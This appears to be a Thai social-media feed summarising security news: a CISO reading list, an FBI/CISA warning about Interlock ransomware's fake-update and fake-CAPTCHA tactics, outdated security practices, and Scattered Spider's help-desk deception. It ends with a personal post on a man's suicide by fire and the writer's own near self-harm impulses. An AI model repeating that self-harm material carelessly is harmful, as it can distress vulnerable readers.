    ส่งเสริมวัฒนธรรมองค์กรที่เปิดกว้างและรับผิดชอบ

    Radical Candor โดย Kim Scott
    เสนอกรอบการให้ feedback ที่ตรงไปตรงมาแต่มีความเห็นอกเห็นใจ
    ช่วยสร้างวัฒนธรรมการสื่อสารที่มีประสิทธิภาพ

    ความเสี่ยงจากการเป็นผู้นำที่ขาดความเห็นอกเห็นใจ
    ผู้นำที่เน้นเทคนิคแต่ละเลยมนุษย์อาจสร้างทีมที่ไม่ยั่งยืน
    การขาด feedback ที่มีคุณภาพทำให้ทีมขาดการพัฒนา

    หนังสือที่เตือนให้กลับมาโฟกัสกับชีวิต

    Our Town โดย Thornton Wilder
    เตือนให้เห็นคุณค่าของชีวิตประจำวันและความสัมพันธ์
    ช่วยให้ผู้นำกลับมาโฟกัสกับสิ่งสำคัญนอกเหนือจากงาน

    The Alchemist โดย Paulo Coelho
    เรื่องราวการเดินทางตามความฝันที่เต็มไปด้วยบทเรียนชีวิต
    สะท้อนความกล้าหาญในการเลือกเส้นทางที่ไม่เป็นไปตามกรอบเดิม

    Get Out of I.T. While You Can โดย Craig Schiefelbein
    ท้าทายให้ผู้นำไอทีทบทวนบทบาทและคุณค่าของตน
    กระตุ้นให้สร้างผลกระทบเชิงกลยุทธ์มากกว่าการทำงานเชิงเทคนิค

    https://www.csoonline.com/article/4027000/the-books-shaping-todays-cybersecurity-leaders.html
    📚 เรื่องเล่าจากโลกไซเบอร์: หนังสือที่เปลี่ยนผู้นำให้กลายเป็นนักคิดเชิงกลยุทธ์ ลองนึกภาพว่าคุณเป็น CISO (Chief Information Security Officer) ที่ต้องรับมือกับภัยคุกคามไซเบอร์ตลอดเวลา ทั้งการโจมตีแบบใหม่ ความเสี่ยงจากพฤติกรรมมนุษย์ และแรงกดดันจากผู้บริหารระดับสูง คุณจะพึ่งพาอะไรเพื่อพัฒนาทักษะการตัดสินใจและความเป็นผู้นำ? คำตอบของผู้นำหลายคนคือ “หนังสือ” — ไม่ใช่แค่คู่มือเทคนิค แต่เป็นแหล่งความรู้ที่ช่วยให้พวกเขาเข้าใจความเสี่ยง มนุษย์ และตัวเองได้ลึกซึ้งขึ้น จากการสำรวจของ CSO Online พบว่า CISO ชั้นนำแนะนำหนังสือหลากหลายแนว ตั้งแต่จิตวิทยาการตัดสินใจอย่าง Thinking, Fast and Slow ไปจนถึงการวัดความเสี่ยงแบบใหม่ใน How to Measure Anything in Cybersecurity Risk และแม้แต่หนังสืออย่าง The Art of Deception ที่เผยกลยุทธ์ของแฮกเกอร์ในการหลอกล่อมนุษย์ สิ่งที่น่าสนใจคือ หลายคนยังแนะนำหนังสือที่ไม่เกี่ยวกับไซเบอร์โดยตรง เช่น The Alchemist หรือ Our Town เพื่อเตือนตัวเองให้กลับมาโฟกัสกับชีวิตและความหมายที่แท้จริง 📙📖 หนังสือที่ช่วยพัฒนาทักษะการวัดและจัดการความเสี่ยง ⭕ ✅ How to Measure Anything in Cybersecurity Risk โดย Douglas Hubbard & Richard Seiersen ➡️ เสนอวิธีวัดความเสี่ยงแบบกึ่งปริมาณที่แม่นยำกว่าการใช้ risk matrix ➡️ ได้รับการแนะนำจากหลาย CISO เช่น Daniel Schatz และ James Blake ✅ Superforecasting โดย Philip Tetlock & Dan Gardner ➡️ เจาะลึกศาสตร์แห่งการพยากรณ์อนาคตอย่างมีหลักการ ➡️ มีตัวอย่างจริงและแนวทางสร้างการคาดการณ์ที่แม่นยำ ⭐📖 หนังสือที่ช่วยลด “เสียงรบกวน” ในการตัดสินใจ ⭕ ✅ Thinking, Fast and Slow โดย Daniel Kahneman ➡️ อธิบายระบบคิดแบบเร็ว (System 1) และช้า (System 2) ➡️ ช่วยให้เข้าใจอคติและข้อผิดพลาดในการตัดสินใจ ✅ Noise โดย Kahneman และทีม ➡️ วิเคราะห์ว่าทำไมมนุษย์ถึงตัดสินใจผิดเพราะ “เสียงรบกวน” ➡️ เสนอวิธีลดความผิดพลาดในการประเมินสถานการณ์ ✅ Yeah, But โดย Marc Wolfe ➡️ ช่วยให้ผู้นำจัดการกับเสียงในหัวที่ขัดขวางการเปลี่ยนแปลง ➡️ ส่งเสริมความชัดเจนในการคิดและการนำทีม ✅ Digital Minimalism โดย Cal Newport ➡️ ส่งเสริมการใช้เทคโนโลยีอย่างมีสติ ➡️ ช่วยปกป้องเวลาและความสนใจของผู้นำ ✅ Better Than Before โดย Gretchen Rubin ➡️ เสนอกรอบการสร้างนิสัยที่ดีเพื่อสนับสนุนเป้าหมายชีวิตและงาน 🙎‍♂️📖 หนังสือที่เน้นความเสี่ยงจากพฤติกรรมมนุษย์ ⭕ ✅ The Art of Deception โดย Kevin Mitnick ➡️ เผยกลยุทธ์ social engineering ที่แฮกเกอร์ใช้หลอกมนุษย์ ➡️ ยังคงเป็นหนังสือพื้นฐานที่มีคุณค่าแม้จะตีพิมพ์มานาน ✅ Secrets and Lies โดย Bruce Schneier ➡️ อธิบายความซับซ้อนของความปลอดภัยดิจิทัล ➡️ เน้นว่าการจัดการพฤติกรรมมนุษย์สำคัญไม่แพ้เทคโนโลยี ✅ Human Hacked โดย Len Noe ➡️ เจาะลึกผลกระทบของ AI ต่อการตัดสินใจของมนุษย์ ➡️ เตือนถึงผลลัพธ์ที่ไม่คาดคิดจากการผสานมนุษย์กับเทคโนโลยี ‼️ ความเสี่ยงจากการละเลยพฤติกรรมมนุษย์ในระบบความปลอดภัย ⛔ องค์กรที่เน้นเทคโนโลยีอย่างเดียวอาจพลาดช่องโหว่จากมนุษย์ ⛔ การไม่เข้าใจ social engineering ทำให้ระบบถูกเจาะง่ายขึ้น 🔝📖 หนังสือที่ช่วยพัฒนาภาวะผู้นำ ⭕ ✅ Dare to Lead โดย Brené Brown ➡️ เน้นความกล้าหาญทางอารมณ์และความยืดหยุ่น ➡️ ส่งเสริมวัฒนธรรมองค์กรที่เปิดกว้างและรับผิดชอบ ✅ Radical Candor โดย Kim Scott ➡️ เสนอกรอบการให้ feedback ที่ตรงไปตรงมาแต่มีความเห็นอกเห็นใจ ➡️ ช่วยสร้างวัฒนธรรมการสื่อสารที่มีประสิทธิภาพ ‼️ ความเสี่ยงจากการเป็นผู้นำที่ขาดความเห็นอกเห็นใจ ⛔ ผู้นำที่เน้นเทคนิคแต่ละเลยมนุษย์อาจสร้างทีมที่ไม่ยั่งยืน ⛔ การขาด feedback ที่มีคุณภาพทำให้ทีมขาดการพัฒนา 🔎📖 หนังสือที่เตือนให้กลับมาโฟกัสกับชีวิต ⭕ ✅ Our Town โดย Thornton Wilder ➡️ เตือนให้เห็นคุณค่าของชีวิตประจำวันและความสัมพันธ์ ➡️ ช่วยให้ผู้นำกลับมาโฟกัสกับสิ่งสำคัญนอกเหนือจากงาน ✅ The Alchemist โดย Paulo Coelho ➡️ เรื่องราวการเดินทางตามความฝันที่เต็มไปด้วยบทเรียนชีวิต ➡️ สะท้อนความกล้าหาญในการเลือกเส้นทางที่ไม่เป็นไปตามกรอบเดิม ✅ Get Out of I.T. While You Can โดย Craig Schiefelbein ➡️ ท้าทายให้ผู้นำไอทีทบทวนบทบาทและคุณค่าของตน ➡️ กระตุ้นให้สร้างผลกระทบเชิงกลยุทธ์มากกว่าการทำงานเชิงเทคนิค https://www.csoonline.com/article/4027000/the-books-shaping-todays-cybersecurity-leaders.html
    WWW.CSOONLINE.COM
    The books shaping today’s cybersecurity leaders
    Cybersecurity leaders reveal the books that have influenced how they lead, think, and manage security in the enterprise — and their own lives.
    0 ความคิดเห็น 0 การแบ่งปัน 338 มุมมอง 0 รีวิว
  • กระทรวงการพัฒนาสังคมและความมั่นคงของมนุษย์ แถลงการณ์ประณามการโจมตีพลเรือนตามแนวชายแดนไทย-กัมพูชา ละเมิดกฎหมายมนุษยธรรมระหว่างประเทศร้ายแรง ส่งผลกระทบกลุ่มเปราะบาง-สวัสดิภาพทางสังคม-ความมั่นคงของมนุษย์

    MSDHS issued an official statement, Condemning the Attacks on Civilians along the Thai-Cambodian Border: Serious Violations of International Humanitarian Law with Adverse Impacts on Vulnerable People, Social Welfare, and Human Security.
    #cambodiaopenedFlre
    กระทรวงการพัฒนาสังคมและความมั่นคงของมนุษย์ แถลงการณ์ประณามการโจมตีพลเรือนตามแนวชายแดนไทย-กัมพูชา ละเมิดกฎหมายมนุษยธรรมระหว่างประเทศร้ายแรง ส่งผลกระทบกลุ่มเปราะบาง-สวัสดิภาพทางสังคม-ความมั่นคงของมนุษย์ MSDHS issued an official statement, Condemning the Attacks on Civilians along the Thai-Cambodian Border: Serious Violations of International Humanitarian Law with Adverse Impacts on Vulnerable People, Social Welfare, and Human Security. #cambodiaopenedFlre
    0 ความคิดเห็น 0 การแบ่งปัน 296 มุมมอง 0 0 รีวิว
  • เรื่องเล่าจากมัลแวร์ที่ปลอมตัวเป็น Chrome: เมื่อ Interlock แรนซัมแวร์ใช้ CAPTCHA หลอกให้รันคำสั่งเอง

    Interlock ถูกตรวจพบครั้งแรกในเดือนกันยายน 2024 และมีการโจมตีเพิ่มขึ้นในช่วงกลางปี 2025 โดย FBI พบว่า:
    - กลุ่มนี้พัฒนาแรนซัมแวร์สำหรับทั้ง Windows และ Linux
    - เน้นโจมตีระบบ virtual machine (VM) และใช้เทคนิคใหม่ในการเข้าถึงระบบ

    เทคนิคที่ใช้มีความแปลกใหม่ เช่น:
    - “Drive-by download” จากเว็บไซต์ที่ถูกแฮก โดยปลอมเป็นอัปเดตของ Chrome, Edge, FortiClient หรือ Cisco Secure Client
    - “ClickFix” — หลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วคัดลอกคำสั่งไปวางในหน้าต่าง Run ของระบบ

    เมื่อเข้าระบบได้แล้ว Interlock จะ:
    - ใช้ web shell และ Cobalt Strike เพื่อควบคุมระบบ
    - ขโมยข้อมูล เช่น username, password และใช้ keylogger บันทึกการพิมพ์
    - เข้ารหัสไฟล์และเปลี่ยนนามสกุลเป็น .interlock หรือ .1nt3rlock
    - ส่งโน้ตร้องขอค่าไถ่ผ่านเว็บไซต์ .onion โดยไม่ระบุจำนวนเงิน
    - ข่มขู่ว่าจะเปิดเผยข้อมูลหากไม่จ่ายค่าไถ่เป็น Bitcoin — และเคยทำจริงหลายครั้ง

    FBI, CISA, HHS และ MS-ISAC แนะนำให้ทุกองค์กรเร่งดำเนินมาตรการป้องกัน เช่น:
    - ใช้ DNS filtering และ firewall เพื่อป้องกันการเข้าถึงเว็บอันตราย
    - อัปเดตระบบและซอฟต์แวร์ทั้งหมด
    - ใช้ MFA และจัดการสิทธิ์การเข้าถึงอย่างเข้มงวด
    - แบ่งเครือข่ายเพื่อลดการแพร่กระจาย
    - สำรองข้อมูลแบบ offline และไม่สามารถแก้ไขได้ (immutable backup)

    FBI และ CISA เตือนภัย Interlock ransomware ที่โจมตีองค์กรและโครงสร้างพื้นฐานสำคัญ
    ใช้เทคนิค double extortion คือทั้งเข้ารหัสและข่มขู่เปิดเผยข้อมูล

    Interlock พัฒนาแรนซัมแวร์สำหรับ Windows และ Linux โดยเน้นโจมตี VM
    ใช้เทคนิคใหม่ เช่น drive-by download และ ClickFix

    ClickFix คือการหลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วรันคำสั่งอันตรายเอง
    เป็นการใช้ social engineering ที่แยบยลและยากต่อการตรวจจับ

    หลังเข้าระบบ Interlock ใช้ Cobalt Strike และ web shell เพื่อควบคุมและขโมยข้อมูล
    รวมถึงการใช้ keylogger เพื่อดักจับการพิมพ์

    ไฟล์ที่ถูกเข้ารหัสจะมีนามสกุล .interlock หรือ .1nt3rlock
    โน้ตร้องขอค่าไถ่ไม่ระบุจำนวนเงิน แต่ให้ติดต่อผ่าน Tor

    หน่วยงานแนะนำให้ใช้ DNS filtering, MFA, network segmentation และ backup แบบ immutable
    พร้อมทรัพยากรฟรีจากโครงการ #StopRansomware

    https://hackread.com/fbi-cisa-interlock-ransomware-target-critical-infrastructure/
    🎙️ เรื่องเล่าจากมัลแวร์ที่ปลอมตัวเป็น Chrome: เมื่อ Interlock แรนซัมแวร์ใช้ CAPTCHA หลอกให้รันคำสั่งเอง Interlock ถูกตรวจพบครั้งแรกในเดือนกันยายน 2024 และมีการโจมตีเพิ่มขึ้นในช่วงกลางปี 2025 โดย FBI พบว่า: - กลุ่มนี้พัฒนาแรนซัมแวร์สำหรับทั้ง Windows และ Linux - เน้นโจมตีระบบ virtual machine (VM) และใช้เทคนิคใหม่ในการเข้าถึงระบบ เทคนิคที่ใช้มีความแปลกใหม่ เช่น: - “Drive-by download” จากเว็บไซต์ที่ถูกแฮก โดยปลอมเป็นอัปเดตของ Chrome, Edge, FortiClient หรือ Cisco Secure Client - “ClickFix” — หลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วคัดลอกคำสั่งไปวางในหน้าต่าง Run ของระบบ เมื่อเข้าระบบได้แล้ว Interlock จะ: - ใช้ web shell และ Cobalt Strike เพื่อควบคุมระบบ - ขโมยข้อมูล เช่น username, password และใช้ keylogger บันทึกการพิมพ์ - เข้ารหัสไฟล์และเปลี่ยนนามสกุลเป็น .interlock หรือ .1nt3rlock - ส่งโน้ตร้องขอค่าไถ่ผ่านเว็บไซต์ .onion โดยไม่ระบุจำนวนเงิน - ข่มขู่ว่าจะเปิดเผยข้อมูลหากไม่จ่ายค่าไถ่เป็น Bitcoin — และเคยทำจริงหลายครั้ง FBI, CISA, HHS และ MS-ISAC แนะนำให้ทุกองค์กรเร่งดำเนินมาตรการป้องกัน เช่น: - ใช้ DNS filtering และ firewall เพื่อป้องกันการเข้าถึงเว็บอันตราย - อัปเดตระบบและซอฟต์แวร์ทั้งหมด - ใช้ MFA และจัดการสิทธิ์การเข้าถึงอย่างเข้มงวด - แบ่งเครือข่ายเพื่อลดการแพร่กระจาย - สำรองข้อมูลแบบ offline และไม่สามารถแก้ไขได้ (immutable backup) ✅ FBI และ CISA เตือนภัย Interlock ransomware ที่โจมตีองค์กรและโครงสร้างพื้นฐานสำคัญ ➡️ ใช้เทคนิค double extortion คือทั้งเข้ารหัสและข่มขู่เปิดเผยข้อมูล ✅ Interlock พัฒนาแรนซัมแวร์สำหรับ Windows และ Linux โดยเน้นโจมตี VM ➡️ ใช้เทคนิคใหม่ เช่น drive-by download และ ClickFix ✅ ClickFix คือการหลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วรันคำสั่งอันตรายเอง ➡️ เป็นการใช้ social engineering ที่แยบยลและยากต่อการตรวจจับ ✅ หลังเข้าระบบ Interlock ใช้ Cobalt Strike และ web shell เพื่อควบคุมและขโมยข้อมูล ➡️ รวมถึงการใช้ keylogger เพื่อดักจับการพิมพ์ ✅ ไฟล์ที่ถูกเข้ารหัสจะมีนามสกุล .interlock หรือ .1nt3rlock ➡️ โน้ตร้องขอค่าไถ่ไม่ระบุจำนวนเงิน แต่ให้ติดต่อผ่าน Tor ✅ หน่วยงานแนะนำให้ใช้ DNS filtering, MFA, network segmentation และ backup แบบ immutable ➡️ พร้อมทรัพยากรฟรีจากโครงการ #StopRansomware https://hackread.com/fbi-cisa-interlock-ransomware-target-critical-infrastructure/
    HACKREAD.COM
    FBI and CISA Warn of Interlock Ransomware Targeting Critical Infrastructure
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 302 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกไซเบอร์: 7 แนวทางความปลอดภัยที่ควรเลิกใช้ ก่อนที่มันจะทำร้ายองค์กร

    ในยุคที่ภัยไซเบอร์ซับซ้อนและเปลี่ยนแปลงเร็ว การยึดติดกับแนวทางเก่า ๆ อาจกลายเป็นจุดอ่อนร้ายแรงขององค์กร บทความจาก CSO Online ได้รวบรวม 7 แนวทางด้านความปลอดภัยที่ล้าสมัยและควรเลิกใช้ทันที พร้อมคำแนะนำจากผู้เชี่ยวชาญในวงการ

    1️⃣ การพึ่ง perimeter-only security
    ไม่เพียงพอในยุค cloud และ hybrid work ต้องใช้แนวคิด Zero Trust

    2️⃣ การเน้น compliance มากกว่าความปลอดภัยจริง
    การตรวจสอบตามข้อกำหนดไม่ช่วยป้องกันภัยคุกคามที่แท้จริง
    ทีมงานอาจมัวแต่ตอบ audit แทนที่จะป้องกันภัยจริง

    3️⃣ การใช้ VPN แบบเก่า (legacy VPNs)
    ไม่สามารถรองรับการทำงานแบบ remote และขาดการอัปเดตที่ปลอดภัย
    เสี่ยงต่อการโจมตีและการเข้าถึงโดยไม่ได้รับอนุญาต

    4️⃣ การคิดว่า EDR เพียงพอแล้ว
    ผู้โจมตีสามารถหลบเลี่ยง EDR โดยโจมตีผ่าน cloud, network หรือ API
    เช่น การใช้ OAuth token หรือการโจมตีผ่าน IoT

    5️⃣ การใช้ SMS เป็นวิธี 2FA
    เสี่ยงต่อการถูกโจมตีผ่าน SIM swapping และช่องโหว่ของเครือข่ายโทรศัพท์
    ไม่ปลอดภัยสำหรับการป้องกันบัญชีสำคัญ

    6️⃣ การใช้ SIEM แบบ on-premises
    เสียค่าใช้จ่ายสูงและไม่สามารถตรวจจับภัยในระบบ cloud ได้อย่างมีประสิทธิภาพ
    เสี่ยงต่อการพลาดข้อมูลสำคัญจากระบบ cloud

    7️⃣ การปล่อยให้ผู้ใช้เป็นผู้รับแบบ passive ในวัฒนธรรมความปลอดภัย
    ต้องสร้างการมีส่วนร่วมและการเรียนรู้อย่างต่อเนื่องเพื่อป้องกัน phishing และ social engineering
    การขาดการฝึกอบรมทำให้ phishing และ social engineering สำเร็จง่ายขึ้น

    https://www.csoonline.com/article/4022848/7-obsolete-security-practices-that-should-be-terminated-immediately.html
    🎙️ เรื่องเล่าจากโลกไซเบอร์: 7 แนวทางความปลอดภัยที่ควรเลิกใช้ ก่อนที่มันจะทำร้ายองค์กร ในยุคที่ภัยไซเบอร์ซับซ้อนและเปลี่ยนแปลงเร็ว การยึดติดกับแนวทางเก่า ๆ อาจกลายเป็นจุดอ่อนร้ายแรงขององค์กร บทความจาก CSO Online ได้รวบรวม 7 แนวทางด้านความปลอดภัยที่ล้าสมัยและควรเลิกใช้ทันที พร้อมคำแนะนำจากผู้เชี่ยวชาญในวงการ 1️⃣ การพึ่ง perimeter-only security ➡️ ไม่เพียงพอในยุค cloud และ hybrid work ต้องใช้แนวคิด Zero Trust 2️⃣ การเน้น compliance มากกว่าความปลอดภัยจริง ➡️ การตรวจสอบตามข้อกำหนดไม่ช่วยป้องกันภัยคุกคามที่แท้จริง ⛔ ทีมงานอาจมัวแต่ตอบ audit แทนที่จะป้องกันภัยจริง 3️⃣ การใช้ VPN แบบเก่า (legacy VPNs) ➡️ ไม่สามารถรองรับการทำงานแบบ remote และขาดการอัปเดตที่ปลอดภัย ⛔ เสี่ยงต่อการโจมตีและการเข้าถึงโดยไม่ได้รับอนุญาต 4️⃣ การคิดว่า EDR เพียงพอแล้ว ➡️ ผู้โจมตีสามารถหลบเลี่ยง EDR โดยโจมตีผ่าน cloud, network หรือ API ⛔ เช่น การใช้ OAuth token หรือการโจมตีผ่าน IoT 5️⃣ การใช้ SMS เป็นวิธี 2FA ➡️ เสี่ยงต่อการถูกโจมตีผ่าน SIM swapping และช่องโหว่ของเครือข่ายโทรศัพท์ ⛔ ไม่ปลอดภัยสำหรับการป้องกันบัญชีสำคัญ 6️⃣ การใช้ SIEM แบบ on-premises ➡️ เสียค่าใช้จ่ายสูงและไม่สามารถตรวจจับภัยในระบบ cloud ได้อย่างมีประสิทธิภาพ ⛔ เสี่ยงต่อการพลาดข้อมูลสำคัญจากระบบ cloud 7️⃣ การปล่อยให้ผู้ใช้เป็นผู้รับแบบ passive ในวัฒนธรรมความปลอดภัย ➡️ ต้องสร้างการมีส่วนร่วมและการเรียนรู้อย่างต่อเนื่องเพื่อป้องกัน phishing และ social engineering ⛔ การขาดการฝึกอบรมทำให้ phishing และ social engineering สำเร็จง่ายขึ้น https://www.csoonline.com/article/4022848/7-obsolete-security-practices-that-should-be-terminated-immediately.html
    WWW.CSOONLINE.COM
    7 obsolete security practices that should be terminated immediately
    Bad habits can be hard to break. Yet when it comes to security, an outdated practice is not only useless, but potentially dangerous.
    0 ความคิดเห็น 0 การแบ่งปัน 336 มุมมอง 0 รีวิว
  • Scattered Spider เป็นกลุ่มแฮกเกอร์ที่เริ่มปรากฏตัวตั้งแต่ปี 2022 โดยใช้วิธี SIM-swapping และ ransomware โจมตีบริษัทโทรคมนาคมและบันเทิง เช่น MGM Resorts และ Caesars Entertainment แต่ในปี 2025 พวกเขาขยายเป้าหมายไปยังอุตสาหกรรมค้าปลีก (Marks & Spencer, Harrods) และสายการบิน (Hawaiian, Qantas) สร้างความเสียหายหลายล้านดอลลาร์

    เทคนิคที่ใช้ล่าสุดคือการหลอกพนักงาน help desk ด้วยข้อมูลส่วนตัวของผู้บริหาร เช่น วันเกิดและเลขประกันสังคม เพื่อรีเซ็ตอุปกรณ์และเข้าถึงบัญชีระดับสูง จากนั้นใช้สิทธิ์นั้นเจาะระบบ Entra ID (Azure AD), SharePoint, Horizon VDI และ VPN เพื่อควบคุมระบบทั้งหมด

    เมื่อถูกตรวจจับ กลุ่มนี้ไม่หนี แต่กลับโจมตีระบบอย่างเปิดเผย เช่น ลบกฎไฟร์วอลล์ของ Azure และปิด domain controller เพื่อขัดขวางการกู้คืนระบบ

    นักวิจัยจาก Rapid7 และ ReliaQuest พบว่า Scattered Spider:
    - ใช้เครื่องมือเช่น ngrok และ Teleport เพื่อสร้างช่องทางลับ
    - ใช้ IAM role enumeration และ EC2 Serial Console เพื่อเจาะระบบ AWS
    - ใช้บัญชีผู้ดูแลระบบที่ถูกแฮกเพื่อดึงข้อมูลจาก CyberArk password vault กว่า 1,400 รายการ

    แม้ Microsoft จะเข้ามาช่วยกู้คืนระบบได้ในที่สุด แต่เหตุการณ์นี้แสดงให้เห็นถึงความสามารถของกลุ่มแฮกเกอร์ที่ผสมผสาน “การหลอกมนุษย์” กับ “การเจาะระบบเทคนิค” ได้อย่างมีประสิทธิภาพ

    ข้อมูลจากข่าว
    - Scattered Spider เริ่มโจมตีตั้งแต่ปี 2022 โดยใช้ SIM-swapping และ ransomware
    - ขยายเป้าหมายไปยังอุตสาหกรรมค้าปลีกและสายการบินในปี 2025
    - ใช้ข้อมูลส่วนตัวของผู้บริหารเพื่อหลอก help desk และเข้าถึงบัญชีระดับสูง
    - เจาะระบบ Entra ID, SharePoint, Horizon VDI, VPN และ CyberArk
    - ใช้เครื่องมือเช่น ngrok, Teleport, EC2 Serial Console และ IAM role enumeration
    - ลบกฎไฟร์วอลล์ Azure และปิด domain controller เพื่อขัดขวางการกู้คืน
    - Microsoft ต้องเข้ามาช่วยกู้คืนระบบ
    - Rapid7 และ ReliaQuest แนะนำให้ใช้ MFA แบบต้าน phishing และจำกัดสิทธิ์ผู้ใช้งาน

    คำเตือนและข้อควรระวัง
    - การหลอก help desk ด้วยข้อมูลส่วนตัวยังคงเป็นช่องโหว่ใหญ่ขององค์กร
    - บัญชีผู้บริหารมักมีสิทธิ์มากเกินไป ทำให้แฮกเกอร์เข้าถึงระบบได้ง่าย
    - การใช้เครื่องมือ legitimate เช่น Teleport อาจหลบการตรวจจับได้
    - หากไม่มีการตรวจสอบสิทธิ์และพฤติกรรมผู้ใช้อย่างสม่ำเสมอ องค์กรอาจไม่รู้ตัวว่าถูกแฮก
    - การพึ่งพา endpoint detection เพียงอย่างเดียวไม่สามารถป้องกันการเจาะระบบแบบนี้ได้
    - องค์กรควรฝึกอบรมพนักงานเรื่อง social engineering และมีระบบตรวจสอบการรีเซ็ตบัญชีที่เข้มงวด

    https://www.csoonline.com/article/4020567/anatomy-of-a-scattered-spider-attack-a-growing-ransomware-threat-evolves.html
    Scattered Spider เป็นกลุ่มแฮกเกอร์ที่เริ่มปรากฏตัวตั้งแต่ปี 2022 โดยใช้วิธี SIM-swapping และ ransomware โจมตีบริษัทโทรคมนาคมและบันเทิง เช่น MGM Resorts และ Caesars Entertainment แต่ในปี 2025 พวกเขาขยายเป้าหมายไปยังอุตสาหกรรมค้าปลีก (Marks & Spencer, Harrods) และสายการบิน (Hawaiian, Qantas) สร้างความเสียหายหลายล้านดอลลาร์ เทคนิคที่ใช้ล่าสุดคือการหลอกพนักงาน help desk ด้วยข้อมูลส่วนตัวของผู้บริหาร เช่น วันเกิดและเลขประกันสังคม เพื่อรีเซ็ตอุปกรณ์และเข้าถึงบัญชีระดับสูง จากนั้นใช้สิทธิ์นั้นเจาะระบบ Entra ID (Azure AD), SharePoint, Horizon VDI และ VPN เพื่อควบคุมระบบทั้งหมด เมื่อถูกตรวจจับ กลุ่มนี้ไม่หนี แต่กลับโจมตีระบบอย่างเปิดเผย เช่น ลบกฎไฟร์วอลล์ของ Azure และปิด domain controller เพื่อขัดขวางการกู้คืนระบบ นักวิจัยจาก Rapid7 และ ReliaQuest พบว่า Scattered Spider: - ใช้เครื่องมือเช่น ngrok และ Teleport เพื่อสร้างช่องทางลับ - ใช้ IAM role enumeration และ EC2 Serial Console เพื่อเจาะระบบ AWS - ใช้บัญชีผู้ดูแลระบบที่ถูกแฮกเพื่อดึงข้อมูลจาก CyberArk password vault กว่า 1,400 รายการ แม้ Microsoft จะเข้ามาช่วยกู้คืนระบบได้ในที่สุด แต่เหตุการณ์นี้แสดงให้เห็นถึงความสามารถของกลุ่มแฮกเกอร์ที่ผสมผสาน “การหลอกมนุษย์” กับ “การเจาะระบบเทคนิค” ได้อย่างมีประสิทธิภาพ ✅ ข้อมูลจากข่าว - Scattered Spider เริ่มโจมตีตั้งแต่ปี 2022 โดยใช้ SIM-swapping และ ransomware - ขยายเป้าหมายไปยังอุตสาหกรรมค้าปลีกและสายการบินในปี 2025 - ใช้ข้อมูลส่วนตัวของผู้บริหารเพื่อหลอก help desk และเข้าถึงบัญชีระดับสูง - เจาะระบบ Entra ID, SharePoint, Horizon VDI, VPN และ CyberArk - ใช้เครื่องมือเช่น ngrok, Teleport, EC2 Serial Console และ IAM role enumeration - ลบกฎไฟร์วอลล์ Azure และปิด domain controller เพื่อขัดขวางการกู้คืน - Microsoft ต้องเข้ามาช่วยกู้คืนระบบ - Rapid7 และ ReliaQuest แนะนำให้ใช้ MFA แบบต้าน phishing และจำกัดสิทธิ์ผู้ใช้งาน ‼️ คำเตือนและข้อควรระวัง - การหลอก help desk ด้วยข้อมูลส่วนตัวยังคงเป็นช่องโหว่ใหญ่ขององค์กร - บัญชีผู้บริหารมักมีสิทธิ์มากเกินไป ทำให้แฮกเกอร์เข้าถึงระบบได้ง่าย - การใช้เครื่องมือ legitimate เช่น Teleport อาจหลบการตรวจจับได้ - หากไม่มีการตรวจสอบสิทธิ์และพฤติกรรมผู้ใช้อย่างสม่ำเสมอ องค์กรอาจไม่รู้ตัวว่าถูกแฮก - การพึ่งพา endpoint detection เพียงอย่างเดียวไม่สามารถป้องกันการเจาะระบบแบบนี้ได้ - องค์กรควรฝึกอบรมพนักงานเรื่อง social engineering และมีระบบตรวจสอบการรีเซ็ตบัญชีที่เข้มงวด https://www.csoonline.com/article/4020567/anatomy-of-a-scattered-spider-attack-a-growing-ransomware-threat-evolves.html
    WWW.CSOONLINE.COM
    Anatomy of a Scattered Spider attack: A growing ransomware threat evolves
    The cybercriminal group has broadened its attack scope across several new industries, bringing valid credentials to bear on help desks before leveraging its new learnings of cloud intrusion tradecraft to set the stage for ransomware.
    0 ความคิดเห็น 0 การแบ่งปัน 403 มุมมอง 0 รีวิว
  • หนุ่มเครียด! ใช้น้ำมันราดตัวเองแล้วจุดไฟเผาตัวเอง ดับสลดต่อหน้าแม่ คาดเครียดเรื่องที่ป่วยขาเป็นแผลมานานจนทำงานไม่ถนัด ผมอ่านรายละเอียดของข่าวในลิงค์แล้ว ขาเป็นแผล หมอไม่ค่อยรับรักษา ยาที่รักษาก็ไม่ได้ผล ผมนึกถึงตระกูล ส. และ หมอผีหมอมู สปสช. แล้วรู้สึกเจ็บใจว่ะ ถึงว่าทำไมใต้ข้อพับขาขวาคันติดเชื้อราไม่หายไม่พอแถมไปติดข้อพับขาซ้ายอีก เป็นนายตัวเองแต่สำหรับผมขาเป็นแผลไม่ใช่ปัญหา แต่ความคาดหวังและแรงกดดันจากคนรอบข้างผมพยายามจะไม่ให้ความสนใจ แต่มาให้ความสนใจจนผมดิ่ง นอยด์ จนผมรู้สึกว่าผมขอลาขาดจากวงคุยการเมืองไปทุกทีๆแล้ว เพราะโหนกระแส บางทีมีนักการเมืองพรรคสีแดง พรรคสีส้ม คอยให้ท้าย โหนกระแสไม่เคยขยี้นักการเมืองส้นตีนพวกนั้นเลย ผมแทบจะยั้งอารมณ์โทสะที่จะนำไปสู่การ ทำร้...ตัวเอง จนนำไปสู่เหตุปัจจัยร้ายแรงต่อไปได้ รู้จักระงับ รู้จักปล่อยวาง แต่ก็จะพยายามละทิ้งไม่ให้จมอยู่กับความคิดและความทรงจำเดิมๆที่มีแต่ความย่ำแย่และพาถอยหลังลงหลุมดำ
    อาชีพช่างออกแบบเฟอร์นิเจอร์หรือวิศวกรเฟอร์นิเจอร์ บางทีถ้าทำงานให้ไอ้เจ้านายปากท็อกซิกผมว่าไม่มีวันรุ่งเรืองในอนาคตหรอก แต่ออกมาเป็นนายตัวเองรุ่งเรืองกว่าเก่านะ แถมได้ฮีลใจไปด้วย มีเวลาว่างเที่ยวกินเท่าไหร่ก็ได้ตามใจฉัน แต่ขอใช้จ่ายอย่างระมัดระวัง
